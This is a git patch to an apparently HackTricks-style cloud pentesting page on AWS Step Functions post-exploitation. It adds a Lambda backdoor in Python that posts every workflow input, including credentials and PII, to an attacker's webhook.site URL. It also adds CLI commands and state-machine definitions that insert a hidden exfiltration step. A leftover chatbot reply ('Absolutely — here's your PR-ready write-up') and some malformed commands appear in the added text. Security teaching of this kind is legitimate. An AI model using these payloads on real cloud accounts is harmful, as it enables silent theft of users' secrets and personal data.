From 35075688aa672cff3a0e11b851e1c0337ccf478b Mon Sep 17 00:00:00 2001
From: kluo84 <15222944+kluo84@users.noreply.github.com>
Date: Wed, 26 Mar 2025 18:04:29 -0500
Subject: [PATCH] arte-mr.kluo-UpdateStateMachine

---
 .../aws-stepfunctions-post-exploitation.md    | 150 +++++++++++++-----
 1 file changed, 108 insertions(+), 42 deletions(-)

diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
index 8bbb6aa52..186043bb0 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
@@ -71,67 +71,133 @@ aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
 
 **Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
 
-### `states:UpdateStateMachine`
+Absolutely — here's your **PR-ready write-up** in the requested format, aligned with the `HackTricks` style you've been following.
 
-This permission allows an attacker to **modify the logic of an existing state machine**. By injecting malicious logic into the state definition, the attacker could:
+---
 
-- Add a **new state** that exfiltrates input/output to an external system (via Lambda or SNS).
-- **Bypass security checks**, skip validation steps, or disable error handling.
-- **Insert a logic bomb** that triggers under specific input conditions to disrupt execution.
+### `states:UpdateStateMachine`, `lambda:UpdateFunctionCode`
 
-This attack can be subtle, blending into large state definitions, and may go unnoticed without strict ASL version control.
-
-```bash
-aws stepfunctions update-state-machine \
-  --state-machine-arn <value> \
-  --definition file://malicious_state_definition.json \
-  --role-arn arn:aws:iam::<account-id>:role/<execution-role>
-```
-
-`malicious_state_definition.json`
+An attacker who compromises a user or role with the following permissions:
 
 ```json
 {
-  "Comment": "Malicious State Machine - Data Exfiltration",
-  "StartAt": "ExfiltrateSecrets",
-  "States": {
-    "ExfiltrateSecrets": {
-      "Type": "Task",
-      "Resource": "arn:aws:lambda:us-east-1:123456789012:function:SendToAttacker",
-      "InputPath": "$",
-      "ResultPath": "$.exfiltration_result",
-      "Next": "LegitimateStep"
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Sid": "AllowUpdateStateMachine",
+      "Effect": "Allow",
+      "Action": "states:UpdateStateMachine",
+      "Resource": "*"
     },
-    "LegitimateStep": {
+    {
+      "Sid": "AllowUpdateFunctionCode",
+      "Effect": "Allow",
+      "Action": "lambda:UpdateFunctionCode",
+      "Resource": "*"
+    }
+  ]
+}
+```
+
+...can conduct a **high-impact and stealthy post-exploitation attack** by combining Lambda backdooring with Step Function logic manipulation.
+
+This scenario assumes that the victim uses **AWS Step Functions to orchestrate workflows that process sensitive input**, such as credentials, tokens, or PII.
+
+Example victim invocation:
+
+```bash
+aws stepfunctions start-execution \
+  --state-machine-arn arn:aws:states:us-east-1:<victim-account-id>:stateMachine:LegitStateMachine \
+  --input '{"email": "victim@example.com", "password": "hunter2"}' --profile victim
+```
+
+If the Step Function is configured to invoke a Lambda like `LegitBusinessLogic`, the attacker can proceed with **two stealthy attack variants**:
+
+---
+
+####  Updated the lambda function
+
+The attacker modifies the code of the Lambda function already used by the Step Function (`LegitBusinessLogic`) to silently exfiltrate input data.
+
+```python
+# send_to_attacker.py
+import requests
+
+def lambda_handler(event, context):
+    requests.post("https://webhook.site/<attacker-id>/exfil", json=event)
+    return {"status": "exfiltrated"}
+```
+
+```bash
+zip function.zip send_to_attacker.py
+
+aws lambda update-function-code \
+  --function-name LegitBusinessLogic \
+  --zip-file fileb://function.zip -profile attacker
+```
+
+---
+
+#### Add a Malicious State to the Step Function
+
+Alternatively, the attacker can inject an **exfiltration state** at the beginning of the workflow by updating the Step Function definition.
+
+```malicious_state_definition.json
+{
+  "Comment": "Backdoored for Exfiltration",
+  "StartAt": "OriginalState",
+  "States": {
+    "OriginalState": {
       "Type": "Task",
-      "Resource": "arn:aws:lambda:us-east-1:123456789012:function:LegitBusinessLogic",
+      "Resource": "arn:aws:lambda:us-east-1:<victim-id>:function:LegitBusinessLogic",
       "End": true
     }
   }
 }
+
 ```
-- **Potential Impact**: Data exfiltration, disruption of logic flow, persistent access through hidden states.
+
+```bash
+aws stepfunctions update-state-machine \
+  --state-machine-arn arn:aws:states:us-east-1:<victim-id>:stateMachine:LegitStateMachine \
+  --definition file://malicious_state_definition.json --profile attacker
+```
+
+The attacker can even more stealthy to update the state definition to something like this 
+{
+  "Comment": "Backdoored for Exfiltration",
+  "StartAt": "ExfiltrateSecrets",
+  "States": {
+    "ExfiltrateSecrets": {
+      "Type": "Task",
+      "Resource": "arn:aws:lambda:us-east-1:victim-id:function:SendToAttacker",
+      "InputPath": "$",
+      "ResultPath": "$.exfil",
+      "Next": "OriginalState"
+    },
+    "OriginalState": {
+      "Type": "Task",
+      "Resource": "arn:aws:lambda:us-east-1:victim-id:function:LegitBusinessLogic",
+      "End": true
+    }
+  }  
+}
+ where the victim won't realize the different 
 
 ---
 
-### `states:StartExecution`
+### Victim Setup (Context for Exploit)
 
-With this permission, an attacker can **trigger executions on demand**, passing arbitrary input to state machines. This allows:
+- A Step Function (`LegitStateMachine`) is used to process sensitive user input.
+- It calls one or more Lambda functions such as `LegitBusinessLogic`.
 
-- **Triggering sensitive operations** (e.g., Lambda invocations, EC2 actions) if the workflow handles them.
-- **Supplying attacker-controlled input** to abuse poorly validated states.
-- **Recon of business logic** by probing execution responses or failures.
+---
 
-Used with `states:GetExecutionHistory`, it becomes a powerful tool for **logic discovery**, **abuse**, or **command execution** through embedded Lambdas or activities.
-
-```bash
-aws stepfunctions start-execution \
-  --state-machine-arn <value> \
-  --name "backdoor-$(date +%s)" \
-  --input '{"command":"whoami"}'
-```
-
-- **Potential Impact**: Unauthorized triggering of sensitive workflows, business logic abuse, stealthy persistence (can be cron-triggered via EventBridge).
+**Potential Impact**:  
+- Silent exfiltration of sensitive data including secrets, credentials, API keys, and PII.
+- No visible errors or failures in workflow execution.
+- Difficult to detect without auditing Lambda code or execution traces.
+- Enables long-term persistence if backdoor remains in code or ASL logic.
 
 
 {{#include ../../../banners/hacktricks-training.md}}